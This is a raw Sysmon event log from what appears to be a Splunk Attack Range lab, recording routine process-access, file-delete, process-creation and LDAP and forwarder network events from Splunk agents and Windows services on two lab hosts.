10:54:02.066{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.066{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.066{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-124A-6216-3305-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.065{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-124A-6216-3305-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:02.064{C8EA50B7-124A-6216-3305-000000003802}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:03.853{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-138MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:03.664{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37A02AF3AF905F4E6AFC16ED211036B,SHA256=1228E1131B6BB6E347D4BB6416B1801E2D0CBBDF764068743EF828F43E186638,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:00.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51379-false10.0.1.12-8000- 23542300x8000000000000000289325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:03.009{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D835C8DAA3F17028308B2BB6AB9902F9,SHA256=A09E7FB542D8A017D8175C650364DB89B2D3662B138F902A6A23887288FBBFC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:04.883{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCD9456668FADA42B906014E30EC6391,SHA256=91FD306AC10A6E9EF2CB4726839D1F61BA6D2B7BA31EA06284474FE84C4EDC60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.208{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-124C-6216-3405-000000003802}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.208{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.208{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.208{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.208{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.208{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-124C-6216-3405-000000003802}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.208{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-124C-6216-3405-000000003802}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.210{C8EA50B7-124C-6216-3405-000000003802}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:04.040{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=896395F6E3B6871BD4F4EB2191551195,SHA256=BCB11314AEBDC39FF7084DBC0F3DD989108E86E98D0AB43EEB921FDCED492ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:05.898{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF1EB8186B516119D5EACFF1D6E70984,SHA256=D64DCD089E48547FEBCD12503BFF8E7010F603044DFBCF06B64C82AD70D19166,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:03.214{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53525-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:03.214{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53525-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000289335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:05.056{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8188B870A2B0A0B5354F798E4504EBFC,SHA256=0BE3BF281461CD94667762904D23669D2988B4DDDC37A465F6F7ACC284EAC8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:06.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE3CDA1EBF161D9AE2A16484D3E11447,SHA256=5E69C4100510640AB94053AA2E6AFB0B980D082EA4DB4FD74133723ECE639F74,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:03.544{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53526-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:06.071{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06E92DC07A1FA65A23DEAD89C5E0DE7E,SHA256=E9B3CF22C8AAF0E49A135893323E3839839B389A2D16BB626D8B0033228A0FDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:07.991{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C26ECDE980C50A651CA1CBCEAA8B96,SHA256=B7909570928289B6AFE28CBC8F3F055E43F7192DA3738307056A103F9450DD12,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.270{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.270{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.270{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.254{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.254{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.254{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.254{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:07.092{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62DD001AA62E08556A2749CB46BB7B8C,SHA256=59AC3FFF746CD60785859BE6129B87AC48049DB218E9FFDF8EC13264CAC60404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:08.107{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2864E01A516351454A1341B6AF10A4A3,SHA256=07B0B15607CAC5D88952D1FAF5F4F2321749B3789507BEA7153D9E9306332F98,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:06.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51380-false10.0.1.12-8000- 23542300x8000000000000000289349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:09.109{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 